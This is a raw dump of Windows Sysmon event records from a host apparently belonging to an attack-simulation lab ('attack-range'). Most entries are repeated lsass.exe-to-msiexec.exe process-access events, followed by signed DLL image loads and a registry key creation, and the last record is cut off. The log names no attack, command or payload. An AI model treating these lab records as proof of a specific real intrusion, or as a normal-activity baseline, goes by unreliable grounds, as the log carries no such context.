15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691231Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691230Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691229Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691228Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691227Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691226Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691225Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691224Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691223Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691222Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691221Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691220Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691219Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691218Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691217Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691216Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691215Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691214Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691213Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691212Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691211Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691210Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691209Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000002691208Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691207Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002691206Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 12241200x80000000000000002691205Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKCRNT AUTHORITY\SYSTEM 10341000x80000000000000002691204Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 